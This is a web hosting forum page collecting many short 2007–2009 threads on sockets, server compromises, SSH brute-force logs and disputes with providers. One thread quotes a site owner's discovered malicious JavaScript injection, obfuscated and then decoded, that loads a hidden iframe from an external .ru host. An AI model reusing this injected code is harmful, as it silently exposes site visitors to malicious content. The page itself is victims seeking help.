How To Limit Sockets To Prevent Hack (logs Provided)
Apr 22, 2008
TCP 67.228.85.130:2848 212.158.153.66:4925 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4926 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4929 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4930 ESTABLISHED
there are 5000's of 212.158.153.66 connecting to 67.228.85.130:2848
how to limit 212.158.153.66 to like max of 30 connecting to 67.228.85.130:2848
View 11 Replies
ADVERTISEMENT
Nov 29, 2007
I try to enhance my server security and prevent local hack but it seem useless.
I tried to chmod home/user/public_html to 711; disable functions; enable php open_basedir.
I can stop some popular shell such as c99shell.php but server can be hacked local.
Anyway to prevent it completely?
View 5 Replies
View Related
Jul 26, 2008
I’ve ordered a server from this company more than 4 days ago and paid for it straight away. they promised it to be setup in 24 hours but no reply since.
If I’m not getting a reply to this post in 24 hours I’m filing a chargeback. I’ve tried emailing them directly or through tickets
View 14 Replies
View Related
Jul 31, 2014
We are getting the below message produced in error.log when accessing from mobile application. Even I have updated apache from 2.4.9 to 2.4.10 also. Still facing the same error like below.
[Thu Jul 31 15:27:10.934564 2014] [ssl:error] [pid 12000:tid 6520] AH02032: Hostname teampark3.sogeti.com. provided via SNI and hostname teampark3.sogeti.com provided via HTTP are different
How to resolve the issue?
View 10 Replies
View Related
Sep 27, 2007
some of our customers have some problems using socket!
when they want to work with sockets , if the data that is requested in socket would be high ( for example 10Kb) it shows time out and the connection fails. but if the data amount is low (like 1KB) the task would be accomplished.
should I do any special configuration?
View 6 Replies
View Related
Nov 18, 2008
I am setting up Vmware in a test server.
Did a ./vmware-config.pl and pressed enter for all the options.
I am seeing vmnet0 and vmnet8 in ifconfig result.
Now, the server has 16 IPs. Not even added to server. Just provided by DC..
I have created few nodes via vmware-web-console. The nodes are created without any issue.
Now..
I am not seeing any option in vmware-web-console to assign IP address to vmware nodes.
How do I assign my public interface IPs (provided by my DC) to every node?
I read someting about bridge networking.
View 2 Replies
View Related
Feb 2, 2009
I had 2 annual accounts with joeusa.com for my website hosting (2 websites). I was a 3-year customer, somewhat disatisfied with tech support service but without time to change hosting servers. My email quit receiving on one website/account about 2 weeks ago. Joe told me they had changed out a hosting server & that was likely the issue. I continued to have no email with Joe being evasive & nonhelpful. Upon logging into the control panel, I noted I was blocked out. I finally got him to agree to check on it, & he stated that the host spam blockers were not activated, & there was too much spam. I had made no changes, so the spam blockers had to be deactivated when they changed servers with no notification to me.
Joe shut down both of my accounts refusing me a prorated refund. I had paid one on Sept. 6 through PayPal for 1 year & the other on Nov. 6 through PayPal, also for a year. I was told by PayPal that they do not cover services, so FYI on PayPal, buyer beware. Joe gave me 24 hours to take my websites down. He also wiped out all of my email that was on the server that I had not been able to receive for the last 2 weeks & I lost all of it with no access to it.
I have email proof of what transpired & only want a prorated refund, what is fair, because I have not received near the full year service purchased for both accounts. He has refused, and I am considering filing fraud charges. My email documentation shows how a simple tech support issue turned into his cheating me out of my money when he cancelled both services & refused any prorated refund.
I have no idea why he has acted so vindictively, including wiping all non-spam email off the server that I was never able to receive, but, based on some of his comments, I believe that he either did not like our Judeo-Christian website or that he had been reading some of my personal email with political comments in the recent election. He was not even aware of my 2nd account until I made him aware that there were two, but he was aware of the ministry website/account, where the email issues were. The other account had no issues, but he cancelled both. Also, the Judeo-Christian ministry website had been hacked on his server by someone alleging to be Islamic about a year ago.
I am not making this report in vengeance. I am only trying to keep the same thing from happening to other consumers. This is a low-bid hosting company, and, once again the old adage, "You get what you pay for," is proven true.
View 14 Replies
View Related
Feb 12, 2009
I did do a search of the forum and it showed a few results, mostly non UK and some which were no longer online.
Now I'll make my own topic doh.
What I am looking for is a host which allows UDP + TCP sockets(fsockopen) so I can query gameservers from my hosting + send other commands to other programs.
Must be located in the UK and be fast
Offering a reseller option is a plus, but not required.
View 8 Replies
View Related
Nov 18, 2008
A potential client asked us the followingo you allow PHP to open sockets on your server? If yes, is there any restriction on the amount of data that can be downloaded?
Will we be able to access and load our remote webpage using PHP? We will use sockets and a Pear library to accomplish this.
We are basically planning on using some content from our remote site on the new site which will be hosted on your servers. Kindly reply back at the earliest.
Is this a potential spammer?
View 2 Replies
View Related
Nov 3, 2007
I had never experienced a server other then a dedicated. I decided to use a VPS. I have migrated a few of my accounts on the VPS.
I am experiencing alot of problems. The server keeps running out of sockets. The provider as increase the sockets limits to the maximum.
At first they told me that platinum management had installed some script while hardening the server that was causing the services to stop responding because too many sockets were used.
I agreed to them rebuilding the VPs, them doing the hardening.
Now, same problem. Too many sockets. Every 6 hours I have to open a ticket and ask to do something so that my server becomes functionnal again.
Now they say that it must be a script I am using on the server. I ask them to track that script, and they say the cannot I must list all active script on server.
Now, Im already a bit upset because their definition of fully managed is not what I have come to expect with other provider. For them being fully managed is they will do anything I ask but wont do any proactive task. Even restart the server when it has failed. On top of that, their control panel is not half working and always gives 404 or jams my computer. So Im in the dark, because ssh is not accessible.
I am asking, how can I verify if the node im on is Oversold?
Is their a way to track sockets usage?
View 14 Replies
View Related
May 27, 2007
Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets
eth1: not promisc and no PF_PACKET sockets
eth1:1: not promisc and no PF_PACKET sockets
eth1:2: not promisc and no PF_PACKET sockets
eth1:3: not promisc and no PF_PACKET sockets
eth1:4: not promisc and no PF_PACKET sockets
Anything I should be worried about?
View 2 Replies
View Related
Jun 27, 2014
I recently upgraded from Plesk 11.5 to 12.0. I also just got an extra IPv4-address for my server (provider is Strato), unfortunately I have some problems with adding it to Plesk.
The IP should be assigned automatically through DHCP, but when I did a Reread IP in Plesk, nothing happened. I tried to manually add the IP, but then Plesk manually configured it and I lost the IPv4-connectivity (IPv6 kept working though).
Now when I want to remove the IP, I get the following error:
Is this a bug or a problem with my specific configuration?
View 3 Replies
View Related
Jul 14, 2008
I have two whm cpanel servers on one provider and they both reporting same
error when i click on phpmyadmin on whm:
#2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)
View 4 Replies
View Related
Oct 17, 2013
I know that port 80 is reserved for HTTP communication to clients on the apache server,and that the client can receive the HTTP response to any port on the client machine, I think there might be more details to it than this. I am required to describe how client and server sockets are used for the client/server communication between an Apache Web server and Web client processes.
View 1 Replies
View Related
Jul 25, 2007
is it possiable to delete these files in the server access_logs and errors_logs
View 1 Replies
View Related
Mar 4, 2015
How to install PHP (v.5.3+) compatible with Plesk v.12.08 with support for sockets and pthreads, mysql and etc. for Centos 6.5 (I have some configuring options).
Should I build it or there are another options provided by Plesk panel?
I need only one PHP (not multiple releases) but fine working if possible.
View 3 Replies
View Related
Sep 26, 2007
recently i found that a javascript code is appended to my index.aspx file on the server !
here is the code :
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%
69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%34%39%61%30%36%30%34%33%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%
6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%31%30%38%34%29%2b%27%35%32%30%62%33%36%35%30%33%5c%27%20%77%69%64%74%68%3d%37%
36%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%
69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%
65%3e%27%29")); </script>
and this is the decoded one :
Code:
window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>')
i need to know 2 things :
1- is it possible that my developer did something wrong and hackers can append anything to his code ? . or it is a server issue and my host provider servers hacked !?
2- does anybody know anything about this piece of code ? (i dont mean it's action , i want to know ! is it known ?)
View 9 Replies
View Related
Oct 27, 2007
When I check statistics for my site, I got this link: [url]
When I click on this site, it run very strange. Are they going to hack me or what they want to do with my site by using the scripts on their site?
after checking this: [url]
View 3 Replies
View Related
Oct 3, 2007
I have searched and searched but can't find anything related here, on Cpanel.net or through google.
I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan).
I cannot find any info on this or how to even stop the redirects.
View 14 Replies
View Related
Jun 11, 2008
My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in?
This is what the system emails tell me:
IP: 70.87.XX.X (2.27.XXXX.static.theplanet.com)
Failures: 5 (sshd)
Interval: 95 seconds
Blocked: Yes
View 4 Replies
View Related
Jan 31, 2007
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
View 3 Replies
View Related
Sep 5, 2007
I haven't really delved into it yet but my wife and I have a personal website with pictures and what-not which was hacked by some Saudi Arabian hacker
site is www.nickandkathi.com
I dont' have the index files with me but is all Ineed to do just re-load my index page on my PC to my file? I'm hosted with hostgator.
How do I stop this from happening again?
View 5 Replies
View Related
May 29, 2007
May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
I got so many of this line in my server log.
First of all, where is the server log located anyway? I got this from SIM.
May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
View 13 Replies
View Related
Apr 9, 2009
I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them while I looked in WHCMS, it said it DID get sent to him. Client said his website was DDOS'd because it used 3 GB of BW in one month and i told him there was no DDOS attack. The kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much.
The client is now saying that he is going to hack attempt the servers to see if they are DDOS Protected or not. Of Course, my servers are protected (WiredTree), so should I be worried?
His quote:
Quote:
I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS.
Also, I have notified WiredTree about this just right now.
View 14 Replies
View Related
Apr 28, 2009
I believe my server has been hacked as I did the top and observe as follows
top - 15:53:39 up 12 days, 3:16, 2 users, load average: 7.87, 10.30, 11.10
Tasks: 789 total, 3 running, 771 sleeping, 0 stopped, 15 zombie
Cpu(s): 20.4% us, 9.3% sy, 4.8% ni, 35.0% id, 30.1% wa, 0.4% hi, 0.0% si
Mem: 2074364k total, 2048296k used, 26068k free, 72136k buffers
Swap: 2040244k total, 2076k used, 2038168k free, 1286884k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22488 root 27 12 3376 1352 508 R 16.8 0.1 12:08.63 rsync
15370 named 20 0 84020 30m 1936 S 4.2 1.5 20:15.72 named
16732 root 16 0 4684 1456 868 S 2.9 0.1 0:01.07 ftp
22489 root 27 12 5444 1860 1420 R 2.9 0.1 3:27.51 ssh
26448 mailnull 17 0 9016 4088 2832 D 2.9 0.2 0:00.11 exim
26436 mailnull 16 0 0 0 0 Z 2.4 0.0 0:00.09 exim <defunct>
477 root 15 0 0 0 0 D 2.1 0.0 217:34.28 kjournald
26408 mailnull 16 0 8964 4584 3244 D 2.1 0.2 0:00.08 exim
26442 mailnull 16 0 0 0 0 Z 2.1 0.0 0:00.08 exim <defunct>
16975 root 15 0 4684 1444 856 S 1.6 0.1 0:00.56 ftp
23071 root 16 0 3760 1420 764 R 1.6 0.1 0:05.08 top
26477 root 16 0 8616 3892 2656 D 1.6 0.2 0:00.06 exim
26486 root 15 0 9420 3888 2656 D 1.3 0.2 0:00.05 exim
16694 root 15 0 4684 1436 848 S 1.0 0.1 0:00.63 ftp
16840 root 15 0 4684 1448 860 S 1.0 0.1 0:00.43 ftp
16865 root 15 0 4684 1444 856 S 1.0 0.1 0:00.72 ftp
16932 root 15 0 4684 1444 856 S 1.0 0.1 0:00.42 ftp
17275 root 15 0 4684 1448 860 S 1.0 0.1 0:00.57 ftp
26434 mailnull 16 0 8972 3956 2704 D 1.0 0.2 0:00.04 exim
26437 mailnull 15 0 8964 3920 2688 D 1.0 0.2 0:00.04 exim
26451 mailnull 15 0 8968 3932 2696 S 1.0 0.2 0:00.04 exim
26489 root 18 0 10568 3912 2656 S 1.0 0.2 0:00.04 exim
5310 root 15 0 40104 35m 1888 S 0.8 1.8 10:55.77 tailwatchd
16771 root 15 0 4684 1448 860 S 0.8 0.1 0:00.44 ftp
16779 root 15 0 4684 1448 860 S 0.8 0.1 0:00.56 ftp
16806 root 16 0 4684 1444 856 S 0.8 0.1 0:00.71 ftp
16844 root 15 0 4684 1440 852 S 0.8 0.1 0:00.57 ftp
16854 root 15 0 4684 1444 856 S 0.8 0.1 0:00.72 ftp
16857 root 15 0 4684 1444 856 S 0.8 0.1 0:00.63 ftp
16868 root 15 0 4684 1448 860 S 0.8 0.1 0:00.79 ftp
16885 root 15 0 4684 1448 860 S 0.8 0.1 0:00.68 ftp
16982 root 15 0 4684 1440 852 S 0.8 0.1 0:00.40 ftp
17008 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp
17038 root 15 0 4684 1448 860 S 0.8 0.1 0:01.01 ftp
17082 root 15 0 4684 1448 860 S 0.8 0.1 0:00.71 ftp
17106 root 15 0 4684 1444 856 S 0.8 0.1 0:00.84 ftp
17288 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp
Now..I am logged in root in two terminals and it shows
root pts/2 Apr 28 15:19 (x.x.x.x)
root pts/3 Apr 28 14:06 (x.x.x.x)
I am just wondering how can the root perform ftp tasks where my root login is sitting idle and what about pts/0 and pts/1
I stopped the ftp service in cpanel and it is started automatically..
View 14 Replies
View Related
Jun 9, 2009
Don't know if anyone else saw this.
[url]
Once again points out the importance of backups.
View 5 Replies
View Related
Feb 26, 2008
I'm not a server admin, but help my client with basic it tasks...we built their website for them and just sort of fell into helping them out when they need it. My client has a vps with knownhost, the vps is only used for hosting the email for their domain, the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklsts and have a negative senderbase score and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them.
Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent.
Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "[FONT='Verdana','sans-serif']The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."[/FONT]
[FONT='Verdana','sans-serif'][/FONT]
[FONT='Verdana','sans-serif']Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?[/FONT]
View 1 Replies
View Related
Feb 2, 2008
my VPS provider just rebuilt my VPS after many hack attacks.
From some days I am getting emails from firewall that someone login to my VPS/mySQL using SSH.
I don't know what they do, but they don't disturb any account. Only some downtime feel during this. But last night my VPS stop working so my provider rebuilt VPS.
how I can secure my VPS now. I have Cpanel installed.
View 7 Replies
View Related
Dec 9, 2007
Physical hack of my server?
My server (cent OS4, plesk 8) was frozen for a day and the NOC had to reboot it, here is the mail I got from my host:
>Your server was frozen, with a kernel panic. Ensure that you check your logs closely to determine how this happened,
After looking at the message log here is the part of the log when the crash happened:
Is this really a kernel panic, I am not sure...
Dec 8 09:05:36 server kernel: input: AT Translated Set 2 keyboard on isa0060/serio0
Dec 8 09:05:37 server hal.hotplug[2701]: DEVPATH is not set
Dec 8 09:05:37 server hal.hotplug[2702]: DEVPATH is not set
Dec 8 09:05:42 server login(pam_unix)[2670]: bad username [ ]
Dec 8 09:05:42 server login[2670]: Authentication started for user
Dec 8 09:05:44 server login[2670]: FAILED LOGIN 1 FROM (null) FOR , Authentication failure
Dec 8 09:05:50 server login(pam_unix)[2670]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root
Dec 8 09:05:50 server login[2670]: Authentication started for user root
Dec 8 09:05:53 server login[2670]: FAILED LOGIN 2 FROM (null) FOR root, Authentication failure
Dec 8 09:05:57 server login(pam_unix)[2671]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty2 ruser= rhost= user=root
Dec 8 09:05:57 server login[2671]: Authentication started for user root
Dec 8 09:05:59 server login[2671]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure
Dec 8 09:06:00 server shutdown: shutting down for system reboot
Dec 8 09:06:00 server init: Switching to runlevel: 6
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
Dec 9 05:52:36 server syslogd 1.4.1: restart.
It looks to me like if someone has physically connected a keyboard and logged in at the NOC.
I use Iptable to restrict ssh access to my IP each time I connect remotly, so I dont' think a remote connection has been possible.
any idea about this line:
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
I think it's just corupted data the was written when the server shutt down.
Also i didn't find any other signes of kernel panic in the logs
Looking at the httpd error log I found this lines before the crash:
[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
apparently somone doing server scan. maybe the 2 events are correlated and the server freeze could have been a result of some buffer overflow attack, but i sould be finding some evidences of this on the apache logs?
What direction should I take to investigate a bit further on this server freeze?
View 3 Replies
View Related
Feb 13, 2007
My company website URL is something along these lines: (I won't give the full URL because I guess that would be classed as advertising.)
www dot olapXXXXXX dot com
Now, we've discovered today that there are links on the site that look like this:
www dot olapXXXXXXdotcom/pornsex.dhtml
These links and pages have not been created by us. The link foes to a page advertising various porn, poker, viagra sites etc.
I've checked the FTP and the pages do not seem to be on the server.
So I'm a little bemused and stuck! How did someone piggyback on our site in this way?
The pages are indexed in Google so if you do a search for our company name and 'strip poker' then the link shows up in Google.
Does anyone have any idea what's going on? We own the URL, we don't believed our password has been compromised, the domain has not expired.
I think perhaps it's something to do with DHTML? We don't use it but all the bad pages do.
The links are not accessible from any of our pages (as for as I can see) but it's still a problem because they show up in Google.
View 1 Replies
View Related
May 30, 2007
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?
Is this stuff largely ignored?
Is anyone else doing this?
Is there an easier way?
View 14 Replies
View Related